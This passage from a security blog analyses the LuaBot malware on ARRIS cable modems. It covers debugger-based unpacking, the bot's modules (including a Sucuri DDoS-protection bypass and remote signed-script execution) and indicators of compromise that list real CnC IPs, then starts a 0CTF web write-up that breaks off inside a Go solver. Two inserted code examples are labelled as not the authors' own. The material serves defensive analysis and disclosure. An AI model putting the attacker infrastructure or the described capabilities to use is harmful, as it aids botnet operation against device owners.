<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKPwhm8H6K-0aSgjY0oiRmyswIvbpsJBosUDV9aJhoEtLDdhl2FZYol2KhCHXwig9jpQT1gExZ5q927hV2_QTwoSopTaZjBl4S3tfRunIzUT5FLD7e_gpXbF-Xr60zf6-NgB2RaVHEkah/s1600/evs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKPwhm8H6K-0aSgjY0oiRmyswIvbpsJBosUDV9aJhoEtLDdhl2FZYol2KhCHXwig9jpQT1gExZ5q927hV2_QTwoSopTaZjBl4S3tfRunIzUT5FLD7e_gpXbF-Xr60zf6-NgB2RaVHEkah/s400/evs.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPJGfnbHneitDeGp4OLp_ho3pOL9hKNnpo96-OFXKPl8TsGSaQzrdl0XJ9UaI02-EL6ZS-xv7ezu-K_qdhiYfmTFv9qBAi_6CriTNdQQtKU4d5EG_arsHKucguC3KVijoh4Z_TxzX2At5/s1600/evs-compile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="438" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPJGfnbHneitDeGp4OLp_ho3pOL9hKNnpo96-OFXKPl8TsGSaQzrdl0XJ9UaI02-EL6ZS-xv7ezu-K_qdhiYfmTFv9qBAi_6CriTNdQQtKU4d5EG_arsHKucguC3KVijoh4Z_TxzX2At5/s640/evs-compile.png" width="640" /></a></div>
<br />
The disassembly is far more legible now. There's a built-in Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUB79jIiEfNG-edegNGQrkwxRaC4OoKW99vsWvdWbjdlsrQ4LxBMJYwn8mN-yZTaeA8Rkyw5igd_nvRzxHEiNs_GX_JDYIP8cbThgpL_n72kPsFXMH1VU1yH40WO82RaElAU8zKVd44J-Z/s1600/botnet_commands.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUB79jIiEfNG-edegNGQrkwxRaC4OoKW99vsWvdWbjdlsrQ4LxBMJYwn8mN-yZTaeA8Rkyw5igd_nvRzxHEiNs_GX_JDYIP8cbThgpL_n72kPsFXMH1VU1yH40WO82RaElAU8zKVd44J-Z/s400/botnet_commands.png" width="181" /></a></div>
<br />
The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the Command and Control server. The malware author packed the Lua source code as a GZIP blob, which makes the reversing job easier for us, as we don't have to deal with Lua bytecode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPa5Wn_Bo0gb8HYmB37_z4RZofAt4NMWZRTOQKkVL77BRWbCWdaP14yL5S9R790iHZJQWRweSt7VsuzQYGSVOKztNOLntUlm-_zpDrwDRx-4AdfskBabNDxJu7rT1OsY3GYLM32a2Dn_Zo/s1600/gz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPa5Wn_Bo0gb8HYmB37_z4RZofAt4NMWZRTOQKkVL77BRWbCWdaP14yL5S9R790iHZJQWRweSt7VsuzQYGSVOKztNOLntUlm-_zpDrwDRx-4AdfskBabNDxJu7rT1OsY3GYLM32a2Dn_Zo/s640/gz.png" width="640" /></a></div>
<br />
The blob at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW30Yf_xwbtpj8ezdIqmpq0jKmaG9SQH3BEWyIzIlgdHmRkhdEjhDJ9YbfZokulLr0yeM-TUWiszW17RdGw1E8E_rAJf1xrqbrK6p_1G4BYw2t8wWB77lPqiIdUNmQ0qGbigjJ7ObXObff/s1600/gz_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW30Yf_xwbtpj8ezdIqmpq0jKmaG9SQH3BEWyIzIlgdHmRkhdEjhDJ9YbfZokulLr0yeM-TUWiszW17RdGw1E8E_rAJf1xrqbrK6p_1G4BYw2t8wWB77lPqiIdUNmQ0qGbigjJ7ObXObff/s640/gz_header.png" width="640" /></a></div>
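The GZIP header carries the MTIME field (a little-endian Unix timestamp at offset 4) that gives the date shown above, and the same header magic can be used to locate packed blobs in any stripped binary without knowing their offset in advance. The following is an added example, not code from this post: it carves every complete gzip member out of a buffer, reports offset, end and header metadata, and skips false-positive magics. The sample binary, the packed "source" inside it and its offset (0x200 here, not the 0xA40B8 from the real sample) are constructed; only the timestamp is the one from the post.

```python
"""Carve embedded gzip members out of a flat binary and read their headers.

Added example, not code from the post: it locates every gzip magic in a
buffer, keeps only offsets where a complete deflate stream follows, and
records the offset, end, MTIME and decompressed payload. The sample binary
and the packed "source" inside it are constructed below.
"""
import calendar
import struct
import zlib
from datetime import datetime, timezone

GZIP_MAGIC = b"\x1f\x8b\x08"      # ID1, ID2, CM = 8 (deflate)


def build_gzip_member(payload, mtime):
    """Hand-assemble an RFC 1952 gzip member with a chosen MTIME (for the sample)."""
    # FLG = 0, MTIME, XFL = 2 (max compression), OS = 3 (Unix)
    header = GZIP_MAGIC + b"\x00" + struct.pack("<I", mtime) + b"\x02\x03"
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)   # raw deflate body
    body = comp.compress(payload) + comp.flush()
    trailer = struct.pack("<II", zlib.crc32(payload) & 0xFFFFFFFF,
                          len(payload) & 0xFFFFFFFF)            # CRC32, ISIZE
    return header + body + trailer


def carve_gzip(buf):
    """Return a dict per complete gzip stream found in buf; false magics are skipped."""
    found = []
    pos = buf.find(GZIP_MAGIC)
    while pos != -1 and pos + 10 <= len(buf):
        # Fixed 10-byte header: magic(3) FLG(1) MTIME(4) XFL(1) OS(1)
        flags, mtime, xfl, os_id = struct.unpack_from("<BIBB", buf, pos + 3)
        inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)      # expect a gzip wrapper
        try:
            payload = inflater.decompress(buf[pos:])
        except zlib.error:
            payload = None
        if payload is not None and inflater.eof:                # stream ended cleanly
            found.append({
                "offset": pos,
                "end": len(buf) - len(inflater.unused_data),
                "flags": flags,
                "xfl": xfl,
                "os": os_id,
                "mtime": mtime,
                "mtime_utc": datetime.fromtimestamp(mtime, timezone.utc)
                                     .strftime("%Y-%m-%d %H:%M:%S"),
                "payload": payload,
            })
        pos = buf.find(GZIP_MAGIC, pos + 1)
    return found


# Constructed sample: an ELF-like prefix, a decoy magic that is not a real
# stream, then the packed "Lua source" at 0x200 with the timestamp from the post.
LUA_SRC = b"-- constructed stand-in for the packed bot source\nreturn { port = 11833 }\n"
MTIME = calendar.timegm((2016, 4, 18, 17, 35, 34, 0, 0, 0))
BLOB_OFFSET = 0x200
SAMPLE_BIN = (b"\x7fELF" + b"\x00" * (0x100 - 4)
              + GZIP_MAGIC + b"\x00" + b"\xff" * 60              # decoy: invalid deflate block
              + b"\x00" * (BLOB_OFFSET - 0x100 - 64)
              + build_gzip_member(LUA_SRC, MTIME)
              + b"\x00" * 0x40)


if __name__ == "__main__":
    for hit in carve_gzip(SAMPLE_BIN):
        print("gzip member at 0x%x-0x%x, mtime %s (UTC), %d bytes unpacked"
              % (hit["offset"], hit["end"], hit["mtime_utc"], len(hit["payload"])))
        print(hit["payload"].decode())
```

Requiring `inflater.eof` is what makes the scan robust: a magic followed by garbage either raises `zlib.error` or leaves the stream incomplete, and both cases are dropped, while the real member is reported with the exact byte range it occupies, which is also what you need to patch or extract it from the ELF with a hex editor.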
<br />
Another easy way to unpack the Lua code is to attach your favorite debugger (<a href="https://github.com/hugsy/gef">gef</a>, of course) to the running binary and dump the process memory (heap).<br />
<br />
First, copy <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a> to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:<br />
<div class="code">
./gdbserver --multi localhost:12345 --attach 1058
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEWiLlsNFeW_5yFvxGVoHjxUJ56-tb-v0crmzf_LccYeNsKuhtS4wWt05_MHEIDKJGENXP6-CRQ6Qlmi3wXecVb6nDAEreb95_Mt692iGmazfvwjWldmJ-FmfTw73pnQG85mSsn5DJji4/s1600/gef1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEWiLlsNFeW_5yFvxGVoHjxUJ56-tb-v0crmzf_LccYeNsKuhtS4wWt05_MHEIDKJGENXP6-CRQ6Qlmi3wXecVb6nDAEreb95_Mt692iGmazfvwjWldmJ-FmfTw73pnQG85mSsn5DJji4/s400/gef1.png" width="400" /></a></div>
<br />
Then, start gef/GDB and attach it to the running server:<br />
<div class="code">
gdb-multiarch -q<br />
set architecture arm<br />
set endian big<br />
set follow-fork-mode child<br />
gef-remote 192.168.100.1:12345</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTmeb2RWKNvFZqFf3MH_QmIMviLR9FrcmOtk0tqbt19X1uRNkiw4NvUu1UoKf2tDppAWcL2RiI20ApqiAWef7vKIdrkLkaS0WMgTh7UeTjPEzpTahPm8hpHdEi-HYfrq_pDGc191UFoLnP/s1600/gef2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTmeb2RWKNvFZqFf3MH_QmIMviLR9FrcmOtk0tqbt19X1uRNkiw4NvUu1UoKf2tDppAWcL2RiI20ApqiAWef7vKIdrkLkaS0WMgTh7UeTjPEzpTahPm8hpHdEi-HYfrq_pDGc191UFoLnP/s400/gef2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Lastly, list the memory regions and dump the heap:<br />
<div class="code">
vmmap<br />
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDWogfyz3_F1G1IkbMRAJrob7gRlQRrFjKdhWb_Jy1ELID5bxgH0pVM-v7l3f0I-AonrCChhv68UHSiR0XP0DRtUTOgvv0AE_tDS3XbCMQ8d3xXfE-hgrKBp-bblXB2gzmAhA_vQTK00gy/s1600/gef-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDWogfyz3_F1G1IkbMRAJrob7gRlQRrFjKdhWb_Jy1ELID5bxgH0pVM-v7l3f0I-AonrCChhv68UHSiR0XP0DRtUTOgvv0AE_tDS3XbCMQ8d3xXfE-hgrKBp-bblXB2gzmAhA_vQTK00gy/s400/gef-3.png" width="400" /></a></div>
<div>
<br /></div>
<div>
That's it, now you have the full source code from the LuaBot:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17QD2ovMPEeSF1USj2eAHTBy7kQMwbmvydb0bmCKdFMVU13hCb4rMHiV3mfRbu3Ucosa3CYQXg1qINCMCL9bW2rMjwluIdhaPZ4gkbz0RDxVLM78xzrSCt-Y8F1pIOsaZVomudv0PhRRd/s1600/gef-hex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17QD2ovMPEeSF1USj2eAHTBy7kQMwbmvydb0bmCKdFMVU13hCb4rMHiV3mfRbu3Ucosa3CYQXg1qINCMCL9bW2rMjwluIdhaPZ4gkbz0RDxVLM78xzrSCt-Y8F1pIOsaZVomudv0PhRRd/s640/gef-hex.png" width="640" /></a></div>
<div>
<br /></div>
The LuaBot source code is composed of several modules:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyPw09jYD4p-VwIxEFDwYAK37_xmuDiuO8bZ5YYLNAo2hREJYs5VVKRyy5MQ5CHR5RLKEPh7YSmcwcnIdlSg-9I3ED8FR6X_DBSjS5p9MuX-5bmYXAHakvsbHVVUb6ZDY6n3l57UMgiS9W/s1600/lua_file_list.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyPw09jYD4p-VwIxEFDwYAK37_xmuDiuO8bZ5YYLNAo2hREJYs5VVKRyy5MQ5CHR5RLKEPh7YSmcwcnIdlSg-9I3ED8FR6X_DBSjS5p9MuX-5bmYXAHakvsbHVVUb6ZDY6n3l57UMgiS9W/s400/lua_file_list.png" width="400" /></a></div>
<br />
The bot settings, including the DNS recursor and the CnC settings, are hardcoded:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTph3bfvRClvS5oK_QiD4Rca8p52-Z42YywWExbPE7GWWwt6kYFNUobDOpVvh4a5d1vg5a8sLnj80vFzz1gYnngy_Iq3KUU7Po_6NGSL9A7t94vs8lGa3BS_L6m4PQW8I88gMGv478Lx7w/s1600/luabot_cfg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTph3bfvRClvS5oK_QiD4Rca8p52-Z42YywWExbPE7GWWwt6kYFNUobDOpVvh4a5d1vg5a8sLnj80vFzz1gYnngy_Iq3KUU7Po_6NGSL9A7t94vs8lGa3BS_L6m4PQW8I88gMGv478Lx7w/s320/luabot_cfg.PNG" width="320" /></a></div>
<br />
The code is really well documented and includes proxy-checking functions and a masscan log parser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvN3bHJvbGDV4mnAyQbb8aKbFfvhmooVcWSIS6tqO3Gx3V5AeXTkOAr0FS6IU2bl1YSFX_Z6HsD5MZRsPLGtcrCmEglRFXa7rsP7Zs8h5u2wDNY7TpWbxybpM8zXjpQBPo7P62GNTFjeCs/s1600/luabot_httpproxy.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvN3bHJvbGDV4mnAyQbb8aKbFfvhmooVcWSIS6tqO3Gx3V5AeXTkOAr0FS6IU2bl1YSFX_Z6HsD5MZRsPLGtcrCmEglRFXa7rsP7Zs8h5u2wDNY7TpWbxybpM8zXjpQBPo7P62GNTFjeCs/s400/luabot_httpproxy.PNG" width="400" /></a></div>
<br />
The bot author seeds random with /dev/urandom (cryptographers rejoice):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvg62ALDZQ9OkWXXLE0VLGaiFieprPSuxi7Owu2PmDIEJ7JsxzeXXp_tqgxa5Vvl1Zd5NXmetyhNTYi_5lYeKGoON9cA18DslVkSZatVsxBsDq67B199V0ZpnnDb8QcXeOfDpCysKPsw9/s1600/luabot_seedrandom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIvg62ALDZQ9OkWXXLE0VLGaiFieprPSuxi7Owu2PmDIEJ7JsxzeXXp_tqgxa5Vvl1Zd5NXmetyhNTYi_5lYeKGoON9cA18DslVkSZatVsxBsDq67B199V0ZpnnDb8QcXeOfDpCysKPsw9/s400/luabot_seedrandom.PNG" width="400" /></a></div>
<br />
LuaBot integrates an embedded JavaScript engine and executes scripts signed with the author's RSA key:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGR6l5gP4TakIBM0xY2WvDxuyvMBIB9DcN4a3yuOdu6TK1pd-LaQ2L7AHPcbuP-9V_1NCAhYMdveylFzqeJAexAqfXn7MwXSpvmR24xd7o_T8a4zTT-sFEmO1NfUhl3vj6Eb-UNN7D41P/s1600/luabot_signedscript.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJGR6l5gP4TakIBM0xY2WvDxuyvMBIB9DcN4a3yuOdu6TK1pd-LaQ2L7AHPcbuP-9V_1NCAhYMdveylFzqeJAexAqfXn7MwXSpvmR24xd7o_T8a4zTT-sFEmO1NfUhl3vj6Eb-UNN7D41P/s400/luabot_signedscript.PNG" width="400" /></a></div>
<br />
Meterpreter is so 2000's, the V7 JavaScript interpreter is named shiterpreter:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWsHPF7huNWokN3pUDp0TpYQsfPC70E1HTzOdo9ZOK836NlnZh4bRCXCkpcLJolQKItl2C7B5wAzInMQ0YDeIxwROUaanXNEM4JKgVCLmujab-YxPviUf7AaTgby3MPol7lCAY1BLHpdkx/s1600/luabot_shiterpreter.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWsHPF7huNWokN3pUDp0TpYQsfPC70E1HTzOdo9ZOK836NlnZh4bRCXCkpcLJolQKItl2C7B5wAzInMQ0YDeIxwROUaanXNEM4JKgVCLmujab-YxPviUf7AaTgby3MPol7lCAY1BLHpdkx/s400/luabot_shiterpreter.PNG" width="400" /></a></div>
<br />
There's a catchy function named checkanus.penetrate_sucuri, in what seems to be some sort of bypass for Sucuri's Distributed Denial of Service (DDoS) protection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQB3Tv6TMHcF2LFY1sA2u1SkY_MIRgzxYVdMFiMyoo8PftrnDv6idvYdf9BYME1A0tua3tIv4PGwFq0_8uLBaNYKxSGW9QvBHzmoh9hSfYl3DpJA0__BI2OO06VPQnvOBuSGBMw4-NwsRN/s1600/luabot_sucuri1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQB3Tv6TMHcF2LFY1sA2u1SkY_MIRgzxYVdMFiMyoo8PftrnDv6idvYdf9BYME1A0tua3tIv4PGwFq0_8uLBaNYKxSGW9QvBHzmoh9hSfYl3DpJA0__BI2OO06VPQnvOBuSGBMw4-NwsRN/s400/luabot_sucuri1.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH8UlpW7OU6UVxj0r5gnsFILv3rIPi4Zz4JPnhWKpj_55KKD6Me6X-7Z53Ux7Na4pM-4IuodAXwP2C6fEvIKV5nJ6huS5opjnYILfSQ6WPx8ePeOMnovU_8joQK9JW8UsjfdkAxLu08pL7/s1600/luabot_sucuri2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH8UlpW7OU6UVxj0r5gnsFILv3rIPi4Zz4JPnhWKpj_55KKD6Me6X-7Z53Ux7Na4pM-4IuodAXwP2C6fEvIKV5nJ6huS5opjnYILfSQ6WPx8ePeOMnovU_8joQK9JW8UsjfdkAxLu08pL7/s400/luabot_sucuri2.PNG" width="297" /></a></div>
<br />
LuaBot has its own lua resolver function for DNS queries:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05nMw8-cEWfj23lbxYqeT2IwPlr2Aqeuk09RdzlKQ619DCzG_eYx71BeQvWetc308qm9X8o0hlaGU3OaLZkDzrZpVlJ1d8aarJsY3xToTWP01NS-s4h_klNEI7vm6GfSmR_J4AKhJ2Tyz/s1600/luabot_dns.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj05nMw8-cEWfj23lbxYqeT2IwPlr2Aqeuk09RdzlKQ619DCzG_eYx71BeQvWetc308qm9X8o0hlaGU3OaLZkDzrZpVlJ1d8aarJsY3xToTWP01NS-s4h_klNEI7vm6GfSmR_J4AKhJ2Tyz/s400/luabot_dns.PNG" width="400" /></a></div>
<br />
Most of the bot capabilities are in line with the ones described in the <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die! blogpost</a>. It's interesting to note that the IPs of the CnC server and of the iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).<br />
<br />
I did not analyse the remote botnet structure, but the modular approach and the interoperability of the malware indicate that there's a professional and ongoing effort.<br />
<br />
<b><br /></b>
<b>Conclusion</b><br />
<b><br /></b></div>
<div>
The analysed malware doesn't have any persistence mechanism to survive reboots: it doesn't try to reflash the firmware or modify non-volatile partitions (NVRAM, for example), but the first stage payload restricts remote access to the device using custom iptables rules.<br />
<br />
This is quite an interesting approach: they can quickly masscan the Internet, block external access to those IoT devices and then selectively infect them using the final stage payloads.<br />
<br />
In 2015, when I initially reported the ARRIS backdoors, there were over <a href="https://twitter.com/bernardomr/status/667643475358318592">600.000 vulnerable ARRIS devices exposed on the Internet</a> and 490.000 of them had telnet services enabled:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkMCRNkrVnjBsEKmFPoMfWQGFlHYRlTEvjhOnbrMutfXPV1oK53KOkMERShi_qMu7yz3kXfZ_skHdbXV-Vl_ejSqhceqvnmGg0k9pPhPpS0nAcoj8fyRbCcZhfGxmjRHBj2-KyOwXH7ynw/s1600/arris-sep-2015-telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="407" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkMCRNkrVnjBsEKmFPoMfWQGFlHYRlTEvjhOnbrMutfXPV1oK53KOkMERShi_qMu7yz3kXfZ_skHdbXV-Vl_ejSqhceqvnmGg0k9pPhPpS0nAcoj8fyRbCcZhfGxmjRHBj2-KyOwXH7ynw/s640/arris-sep-2015-telnet.png" width="640" /></a></div>
If we perform the same query today (September 2016), we can see that the number of exposed devices has been reduced to approximately 35.000:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu0c9n7nj3T5Vlva5G94sSxAPmAGux5E6x5pmyKp5DEEnDnGwTB5YolT4oCdZHG0m_HdpiWSEPKsKur8klNiXcBoFF0XoKEzt5fJQzBzBFb0Eqb4YiJGOFUGlDbn82JYmoBa7YhR_R3NjL/s1600/arris-sep2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu0c9n7nj3T5Vlva5G94sSxAPmAGux5E6x5pmyKp5DEEnDnGwTB5YolT4oCdZHG0m_HdpiWSEPKsKur8klNiXcBoFF0XoKEzt5fJQzBzBFb0Eqb4YiJGOFUGlDbn82JYmoBa7YhR_R3NjL/s640/arris-sep2016.png" width="640" /></a></div>
I know that the media coverage and the <a href="https://www.kb.cert.org/vuls/id/419568">security bulletins</a> contributed to that, but I wonder how many of those devices were infected and had external access restricted by some sort of malware...<br />
<br /></div>
<div>
The high number of Linux devices with Internet-facing administrative interfaces, the use of <a href="https://www.gnu.org/proprietary/proprietary-back-doors.html">proprietary backdoors</a>, the lack of firmware updates and the ease of crafting IoT exploits make them easy targets for online criminals.<br />
<br />
<div>
IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and end users have to keep their home devices patched and secured.</div>
<br />
We need to find better ways to detect, block and contain this new trend. Approaches like the one from <a href="http://senr.io/">SENRIO</a> can help ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.<br />
<br />
<br /></div>
<div>
<b><span style="font-family: inherit;">Indicators of Compromise (IOCs)</span></b><br />
<b><span style="font-family: inherit;"><br /></span></b>
<span style="font-family: inherit;">LuaBot ARMEB Binaries:</span></div>
<div>
<ul>
<li>drop (5deb17c660de9d449675ab32048756ed)</li>
<li>.nttpd (c867d00e4ed65a4ae91ee65ee00271c7)</li>
<li>.sox (4b8c0ec8b36c6bf679b3afcc6f54442a)</li>
<li>.sox.rslv (889100a188a42369fd93e7010f7c654b)</li>
<li>.arm_puma5 (061b03f8911c41ad18f417223840bce0)</li>
</ul>
<br />
GCC Toolchains:<br />
<ul>
<li>GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4</li>
<li>GCC: (GNU) 4.2.0 TI-Puma5 20100224</li>
</ul>
<br />
Dropper and CnC IPs:<br />
<ul>
<li>46.148.18.122</li>
<li>80.87.205.92</li>
</ul>
<div>
<br /></div>
IP Ranges whitelisted by the Attacker:</div>
<div>
<ul>
<li>46.148.18.0/24</li>
<li>185.56.30.0/24</li>
<li>217.79.182.0/24</li>
<li>85.114.135.0/24</li>
<li>95.213.143.0/24</li>
<li>185.53.8.0/24</li>
</ul>
<div>
<br /></div>
</div>
</div>
<b>0CTF 2016 Write Up: Monkey (Web 4)</b> (Bernardo Rodrigues, published 2016-03-13)<br />
<br />
The Chinese <a href="https://ctf.0ops.sjtu.cn/">0CTF</a> took place on March 12-13 and it was yet another fun CTF. I played with my teammates from <a href="https://ctftime.org/team/10288">TheGoonies</a> and we were ranked #48.<br />
<br />
I found the Web task "Monkey" particularly interesting: I solved it with the help of my friend <a href="https://twitter.com/danilonc">@danilonc</a>, but it took way longer than it should have because of some **Spoiler Alert** DNS glitches. According to the scoreboard, approximately 35 teams were able to solve it.<br />
<br />
<b>Task: Monkey (Web - 4pts)</b><br />
<br />
<div class="code">
What is Same Origin Policy?<br />
<br />
you can test this problem on your local machine<br />
<br />
http://202.120.7.200</div>
<br />
The running application receives a Proof-of-Work string and an arbitrary URL, and instructs a "monkey" to browse the submitted URL for 2 minutes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75yJN4PKP54CO2CqL8kocfHBAFwlp3UuxR3g1YMnWNkBuqbSCalS-kzcgi1UxSHVz3M8XYf_Gc0ixBXYGb9dZQ2NUDmW28DJ7fkKUjWmJkgcZO-mJuz_352edHFcgrXAth2KXfRRtsMXx/s1600/Screen+Shot+2016-03-13+at+15.32.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75yJN4PKP54CO2CqL8kocfHBAFwlp3UuxR3g1YMnWNkBuqbSCalS-kzcgi1UxSHVz3M8XYf_Gc0ixBXYGb9dZQ2NUDmW28DJ7fkKUjWmJkgcZO-mJuz_352edHFcgrXAth2KXfRRtsMXx/s320/Screen+Shot+2016-03-13+at+15.32.39.png" width="320" /></a></div>
<b>Proof-of-Work</b><br />
<br />
Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars of their MD5 against the challenge. The POW challenge was more CPU-intensive than usual, so the traditional bash/python one-liner CTF scripts would require some performance improvements.<br />
<br />
<a href="https://twitter.com/danilonc">@danilonc</a> had written a quick hack in Go to brute-force and solve the POW of older CTF challenges, so we just slightly modified it:<br />
<br />
<script src="https://gist.github.com/bmaia/99052777c4046e974af0.js"></script>
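The gist above is the team's own solver. What follows is an added example written for this edit, not the authors' code, implementing the same search the paragraph describes: hash candidate strings with MD5 until the lowercase hex digest starts with the challenge prefix, with one goroutine per CPU so the work parallelises. The candidate format (a per-worker counter instead of random strings) and the names <code>solvePOW</code> and <code>hasMD5Prefix</code> are assumptions; the task's exact request/response format is not shown in the write-up, so the program only produces the string.<br />

```go
package main

import (
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"runtime"
	"strings"
	"sync"
)

// hasMD5Prefix reports whether the lowercase hex MD5 of s starts with prefix.
func hasMD5Prefix(s, prefix string) bool {
	sum := md5.Sum([]byte(s))
	return strings.HasPrefix(hex.EncodeToString(sum[:]), prefix)
}

// solvePOW finds a string whose MD5 starts with prefix (lowercase hex).
// One worker goroutine per CPU walks its own counter space ("w<id>-<n>"),
// so no candidate is hashed twice; the first hit stops all workers.
// Expected work is 16^len(prefix) hashes, about 16M for a 6-char prefix.
func solvePOW(prefix string) string {
	found := make(chan string, 1)
	stop := make(chan struct{})
	var once sync.Once
	for w := 0; w < runtime.NumCPU(); w++ {
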